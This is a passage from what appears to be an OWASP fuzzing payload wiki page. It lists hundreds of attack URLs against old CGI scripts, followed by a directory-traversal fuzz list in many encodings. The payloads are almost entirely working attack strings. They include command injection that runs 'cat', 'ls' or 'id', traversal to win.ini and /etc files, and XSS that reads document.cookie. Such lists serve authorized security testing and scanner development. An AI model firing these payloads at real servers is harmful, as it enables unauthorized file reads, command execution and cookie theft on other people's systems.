formmail?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
fortune&lt;br /&gt;
ftp.pl&lt;br /&gt;
ftpsh&lt;br /&gt;
gH.cgi&lt;br /&gt;
gbadmin.cgi?action=change_adminpass&lt;br /&gt;
gbadmin.cgi?action=change_automail&lt;br /&gt;
gbadmin.cgi?action=colors&lt;br /&gt;
gbadmin.cgi?action=setup&lt;br /&gt;
gbook/gbook.cgi?_MAILTO=xx;ls&lt;br /&gt;
gbpass.pl&lt;br /&gt;
generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1&lt;br /&gt;
generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1&lt;br /&gt;
generate.cgi?content=../../../../../../../../../..{KNOWNFILE}%00board=board_1&lt;br /&gt;
getdoc.cgi&lt;br /&gt;
gettransbitmap&lt;br /&gt;
glimpse&lt;br /&gt;
gm-authors.cgi&lt;br /&gt;
gm-cplog.cgi&lt;br /&gt;
gm.cgi&lt;br /&gt;
guestbook.cgi&lt;br /&gt;
guestbook.cgi?user=cpanel&amp;amp;template=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
guestbook.pl&lt;br /&gt;
guestbook/passwd&lt;br /&gt;
handler.cgi&lt;br /&gt;
hitview.cgi&lt;br /&gt;
horde/test.php&lt;br /&gt;
horde/test.php?mode=phpinfo&lt;br /&gt;
hsx.cgi?show=../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
htgrep?file=index.html&amp;amp;hdr={KNOWNFILE}&lt;br /&gt;
html2chtml.cgi&lt;br /&gt;
html2wml.cgi&lt;br /&gt;
htmlscript?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'XSS'%29%3B%3C%2Fscript%3E&lt;br /&gt;
htsearch?-c/nonexistant&lt;br /&gt;
htsearch?config=foofighter&amp;amp;restrict=&amp;amp;exclude=&amp;amp;method=and&amp;amp;format=builtin-long&amp;amp;sort=score&amp;amp;words=&lt;br /&gt;
htsearch?exclude=%60{KNOWNFILE}%60&lt;br /&gt;
ibill.pm&lt;br /&gt;
icat&lt;br /&gt;
if/admin/nph-build.cgi&lt;br /&gt;
ikonboard/help.cgi?&lt;br /&gt;
imageFolio.cgi&lt;br /&gt;
imagefolio/admin/admin.cgi&lt;br /&gt;
imagemap&lt;br /&gt;
include/new-visitor.inc.php&lt;br /&gt;
index.js0x70&lt;br /&gt;
index.pl&lt;br /&gt;
info2www&lt;br /&gt;
info2www '(../../../../../../../bin/mail root &amp;lt;{KNOWNFILE}&amp;gt;&lt;br /&gt;
infosrch.cgi&lt;br /&gt;
ion-p?page=../../../../..{KNOWNFILE}&lt;br /&gt;
jailshell&lt;br /&gt;
jj&lt;br /&gt;
journal.cgi?folder=journal.cgi%00&lt;br /&gt;
ksh&lt;br /&gt;
lastlines.cgi?process&lt;br /&gt;
listrec.pl&lt;br /&gt;
loadpage.cgi?user_id=1&amp;amp;file=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
loadpage.cgi?user_id=1&amp;amp;file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&lt;br /&gt;
log-reader.cgi&lt;br /&gt;
log/&lt;br /&gt;
log/nether-log.pl?checkit&lt;br /&gt;
login.cgi&lt;br /&gt;
login.pl&lt;br /&gt;
login.pl?course_id=\&lt;br /&gt;
logit.cgi&lt;br /&gt;
logs.pl&lt;br /&gt;
logs/&lt;br /&gt;
logs/access_log&lt;br /&gt;
logs/error_log&lt;br /&gt;
lookwho.cgi&lt;br /&gt;
ls&lt;br /&gt;
lwgate&lt;br /&gt;
lwgate.cgi&lt;br /&gt;
magiccard.cgi?pa=3Dpreview&amp;amp;amp;next=3Dcustom&amp;amp;amp;page=3D../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mail&lt;br /&gt;
mail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
mail/nph-mr.cgi?do=loginhelp&amp;amp;configLanguage=../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
mailit.pl&lt;br /&gt;
maillist.cgi&lt;br /&gt;
maillist.pl&lt;br /&gt;
mailnews.cgi&lt;br /&gt;
main.cgi?board=FREE_BOARD&amp;amp;command=down_load&amp;amp;filename=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
majordomo.pl&lt;br /&gt;
man2html&lt;br /&gt;
mastergate/search.cgi?search=0&amp;amp;search_on=all&lt;br /&gt;
meta.pl&lt;br /&gt;
mgrqcgi&lt;br /&gt;
mini_logger.cgi&lt;br /&gt;
mmstdod.cgi&lt;br /&gt;
moin.cgi?test&lt;br /&gt;
mojo/mojo.cgi&lt;br /&gt;
mrtg.cfg?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mrtg.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mrtg.cgi?cfg=blah&lt;br /&gt;
ms_proxy_auth_query/&lt;br /&gt;
mt-static/&lt;br /&gt;
mt-static/mt-check.cgi&lt;br /&gt;
mt-static/mt-load.cgi&lt;br /&gt;
mt-static/mt.cfg&lt;br /&gt;
mt/&lt;br /&gt;
mt/mt-check.cgi&lt;br /&gt;
mt/mt-load.cgi&lt;br /&gt;
mt/mt.cfg&lt;br /&gt;
multihtml.pl?multi={KNOWNFILE}%00html&lt;br /&gt;
musicqueue.cgi&lt;br /&gt;
myguestbook.cgi?action=view&lt;br /&gt;
namazu.cgi&lt;br /&gt;
nbmember.cgi?cmd=list_all_users&lt;br /&gt;
netauth.cgi?cmd=show&amp;amp;page=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
netpad.cgi&lt;br /&gt;
newsdesk.cgi?t=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
nimages.php&lt;br /&gt;
nlog-smb.cgi&lt;br /&gt;
nlog-smb.pl&lt;br /&gt;
non-existent.pl&lt;br /&gt;
noshell&lt;br /&gt;
nph-emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
nph-error.pl&lt;br /&gt;
nph-exploitscanget.cgi&lt;br /&gt;
nph-maillist.pl&lt;br /&gt;
nph-publish&lt;br /&gt;
nph-publish.cgi&lt;br /&gt;
nph-showlogs.pl?files=../../&amp;amp;filter=.*&amp;amp;submit=Go&amp;amp;linecnt=500&amp;amp;refresh=0&lt;br /&gt;
nph-test-cgi&lt;br /&gt;
ntitar.pl&lt;br /&gt;
opendir.php?{KNOWNFILE}&lt;br /&gt;
orders/orders.txt&lt;br /&gt;
pagelog.cgi&lt;br /&gt;
pals-cgi?palsAction=restart&amp;amp;documentName={KNOWNFILE}&lt;br /&gt;
parse-file&lt;br /&gt;
pass&lt;br /&gt;
passwd&lt;br /&gt;
passwd.txt&lt;br /&gt;
password&lt;br /&gt;
pbcgi.cgi?name=Joe%Camel&amp;amp;email=%3C&lt;br /&gt;
perl&lt;br /&gt;
perl?-v&lt;br /&gt;
perlshop.cgi&lt;br /&gt;
pfdispaly.cgi?'%0A/bin/cat%20{KNOWNFILE}|'&lt;br /&gt;
pfdispaly.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
pfdisplay.cgi?'%0A/bin/cat%20{KNOWNFILE}|'&lt;br /&gt;
phf&lt;br /&gt;
phf.cgi?QALIA&lt;br /&gt;
phf?Qname=root%0Acat%20{KNOWNFILE}%20&lt;br /&gt;
photo/&lt;br /&gt;
photo/manage.cgi&lt;br /&gt;
photo/protected/manage.cgi&lt;br /&gt;
php-cgi&lt;br /&gt;
php.cgi?{KNOWNFILE}&lt;br /&gt;
plusmail&lt;br /&gt;
pollit/Poll_It_&lt;br /&gt;
pollssi.cgi&lt;br /&gt;
post-query&lt;br /&gt;
post_query&lt;br /&gt;
postcards.cgi&lt;br /&gt;
powerup/r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
printenv&lt;br /&gt;
printenv.tmp&lt;br /&gt;
probecontrol.cgi?command=enable&amp;amp;username=cancer&amp;amp;password=killer&lt;br /&gt;
processit.pl&lt;br /&gt;
profile.cgi&lt;br /&gt;
pu3.pl&lt;br /&gt;
publisher/search.cgi?dir=jobs&amp;amp;template=;cat%20{KNOWNFILE}|&amp;amp;output_number=10&lt;br /&gt;
query&lt;br /&gt;
query?mss=%2e%2e/config&lt;br /&gt;
quickstore.cgi?page=../../../../../../../../../..{KNOWNFILE}%00html&amp;amp;cart_id=&lt;br /&gt;
quikstore.cfg&lt;br /&gt;
quizme.cgi&lt;br /&gt;
r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ratlog.cgi&lt;br /&gt;
redirect&lt;br /&gt;
register.cgi&lt;br /&gt;
replicator/webpage.cgi/&lt;br /&gt;
responder.cgi&lt;br /&gt;
retrieve_password.pl&lt;br /&gt;
rksh&lt;br /&gt;
rmp_query&lt;br /&gt;
robadmin.cgi&lt;br /&gt;
robpoll.cgi&lt;br /&gt;
rpm_query&lt;br /&gt;
rsh&lt;br /&gt;
rtm.log&lt;br /&gt;
rwcgi60&lt;br /&gt;
rwcgi60/showenv&lt;br /&gt;
rwwwshell.pl&lt;br /&gt;
sawmill5?rfcf+%22{KNOWNFILE}%22+spbn+1,1,21,1,1,1,1&lt;br /&gt;
sawmill?rfcf+%22&lt;br /&gt;
sbcgi/sitebuilder.cgi&lt;br /&gt;
scoadminreg.cgi&lt;br /&gt;
scripts/*%0a.pl&lt;br /&gt;
search.cgi&lt;br /&gt;
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini&lt;br /&gt;
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&lt;br /&gt;
search.php?searchstring=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
search.pl&lt;br /&gt;
search.pl?Realm=All&amp;amp;Match=0&amp;amp;Terms=test&amp;amp;nocpp=1&amp;amp;maxhits=10&amp;amp;;Rank=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
search.pl?form=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
search/search.cgi?keys=*&amp;amp;prc=any&amp;amp;catigory=../../../../../../../../../../../../etc&lt;br /&gt;
sendform.cgi&lt;br /&gt;
sendpage.pl?message=test\;/bin/ls%20/etc;echo%20\message&lt;br /&gt;
sendtemp.pl?templ=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
session/adminlogin&lt;br /&gt;
sewse?/home/httpd/html/sewse/jabber/comment2.jse+{KNOWNFILE}&lt;br /&gt;
sh&lt;br /&gt;
shop.cgi?page=../../../../../../..{KNOWNFILE}&lt;br /&gt;
shop.pl/page=;cat%20shop.pl|&lt;br /&gt;
shop/auth_data/auth_user_file.txt&lt;br /&gt;
shop/orders/orders.txt&lt;br /&gt;
shopper.cgi?newpage=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
shopplus.cgi?dn=domainname.com&amp;amp;cartid=%CARTID%&amp;amp;file=;cat%20{KNOWNFILE}|&lt;br /&gt;
show.pl&lt;br /&gt;
showcheckins.cgi?person=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
showuser.cgi&lt;br /&gt;
simple/view_page?mv_arg=|cat%20{KNOWNFILE}|&lt;br /&gt;
simplestguest.cgi&lt;br /&gt;
simplestmail.cgi&lt;br /&gt;
smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
smartsearch/smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
sojourn.cgi?cat=../../../../../../../../../../etc/password%00&lt;br /&gt;
spin_client.cgi?aaaaaaaa&lt;br /&gt;
ss&lt;br /&gt;
sscd_suncourier.pl&lt;br /&gt;
ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e{KNOWNFILE}&lt;br /&gt;
start.cgi/%3Cscript%3Ealert('XSS');%3C/script%3E&lt;br /&gt;
stat.pl&lt;br /&gt;
stat/&lt;br /&gt;
stats-bin-p/reports/index.html&lt;br /&gt;
stats.pl&lt;br /&gt;
stats.prf&lt;br /&gt;
stats/&lt;br /&gt;
stats/statsbrowse.asp?filepath=c:\&amp;amp;Opt=3&lt;br /&gt;
stats_old/&lt;br /&gt;
statsconfig&lt;br /&gt;
statusconfig.pl&lt;br /&gt;
statview.pl&lt;br /&gt;
store.cgi?&lt;br /&gt;
store/agora.cgi?cart_id=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
store/agora.cgi?page=whatever33.html&lt;br /&gt;
store/index.cgi?page=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
story.pl?next=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
story/story.pl?next=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
survey&lt;br /&gt;
survey.cgi&lt;br /&gt;
sws/admin.html&lt;br /&gt;
sws/manager.pl&lt;br /&gt;
tablebuild.pl&lt;br /&gt;
talkback.cgi?article=../../../../../../../..{KNOWNFILE}%00&amp;amp;action=view&amp;amp;matchview=1&lt;br /&gt;
tcsh&lt;br /&gt;
technote/main.cgi?board=FREE_BOARD&amp;amp;command=down_load&amp;amp;filename=/../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
test-cgi.tcl&lt;br /&gt;
test-cgi?/*&lt;br /&gt;
test-env&lt;br /&gt;
test.cgi&lt;br /&gt;
test/test.cgi&lt;br /&gt;
texis/junk&lt;br /&gt;
texis/phine&lt;br /&gt;
textcounter.pl&lt;br /&gt;
tidfinder.cgi&lt;br /&gt;
tigvote.cgi&lt;br /&gt;
title.cgi&lt;br /&gt;
tpgnrock&lt;br /&gt;
traffic.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
troops.cgi&lt;br /&gt;
ttawebtop.cgi/?action=start&amp;amp;pg=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ultraboard.cgi&lt;br /&gt;
ultraboard.pl&lt;br /&gt;
unlg1.1&lt;br /&gt;
unlg1.2&lt;br /&gt;
update.dpgs&lt;br /&gt;
upload.cgi&lt;br /&gt;
uptime&lt;br /&gt;
urlcount.cgi?%3CIMG%20&lt;br /&gt;
ustorekeeper.pl?command=goto&amp;amp;file=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
utm/admin&lt;br /&gt;
utm/utm_stat&lt;br /&gt;
view-source&lt;br /&gt;
view-source?view-source&lt;br /&gt;
view_item?HTML_FILE=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
viewcvs.cgi/viewcvs/?cvsroot=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\&lt;br /&gt;
viewlogs.pl&lt;br /&gt;
viewsource?{KNOWNFILE}&lt;br /&gt;
viralator.cgi&lt;br /&gt;
virgil.cgi&lt;br /&gt;
vote.cgi&lt;br /&gt;
vpasswd.cgi&lt;br /&gt;
vq/demos/respond.pl?&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
w3-msql&lt;br /&gt;
w3-sql&lt;br /&gt;
wais.pl&lt;br /&gt;
way-board.cgi?db={KNOWNFILE}%00&lt;br /&gt;
way-board/way-board.cgi?db={KNOWNFILE}%00&lt;br /&gt;
webais&lt;br /&gt;
webbbs.cgi&lt;br /&gt;
webbbs/webbbs_config.pl?name=joe&amp;amp;email=test@example.com&amp;amp;body=aaaaffff&amp;amp;followup=10;cat%20{KNOWNFILE}&lt;br /&gt;
webcart/webcart.cgi?CONFIG=mountain&amp;amp;CHANGE=YE&lt;br /&gt;
webdist.cgi?distloc=;cat%20{KNOWNFILE}&lt;br /&gt;
webdriver&lt;br /&gt;
webgais&lt;br /&gt;
webif.cgi&lt;br /&gt;
webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
webmap.cgi&lt;br /&gt;
webnews.pl&lt;br /&gt;
webplus?about&lt;br /&gt;
webplus?script=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
websendmail&lt;br /&gt;
webspirs.cgi?sp.nextform=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
webutil.pl&lt;br /&gt;
webutils.pl&lt;br /&gt;
webwho.pl&lt;br /&gt;
where.pl?sd=ls%20/etc&lt;br /&gt;
whois.cgi?action=load&amp;amp;whois=%3Bid&lt;br /&gt;
whois.cgi?lookup=;&amp;amp;ext=/bin/cat%20{KNOWNFILE}&lt;br /&gt;
whois/whois.cgi?lookup=;&amp;amp;ext=/bin/cat%20{KNOWNFILE}&lt;br /&gt;
whois_raw.cgi?fqdn=%0Acat%20{KNOWNFILE}&lt;br /&gt;
windmail&lt;br /&gt;
wrap&lt;br /&gt;
wrap.cgi&lt;br /&gt;
ws_ftp.ini&lt;br /&gt;
www-sql&lt;br /&gt;
wwwadmin.pl&lt;br /&gt;
wwwboard.cgi.cgi&lt;br /&gt;
wwwboard.pl&lt;br /&gt;
wwwstats.pl&lt;br /&gt;
wwwthreads/3tvars.pm&lt;br /&gt;
wwwthreads/w3tvars.pm&lt;br /&gt;
wwwwais&lt;br /&gt;
zml.cgi?file=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
zsh&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Generic 8 Directory Deep Traversal Fuzz (17 March 2010 - Total Statements: 879) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Generic 8 Directory Deep Traversal Fuzz (17 March 2010) &lt;br /&gt;
# Derived from the awesome &amp;quot;Directory Traversal Fuzzing Code&amp;quot; v0.2 by Luca Carettoni&lt;br /&gt;
# Did some cleanup &amp;amp; removed anything to the right of {FILE} for inclusion in a&lt;br /&gt;
# separate fuzzfile for more flexibiity, for the OWASP Fuzzing Code Database. &lt;br /&gt;
# adam.muntner@uietmove.com &lt;br /&gt;
&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
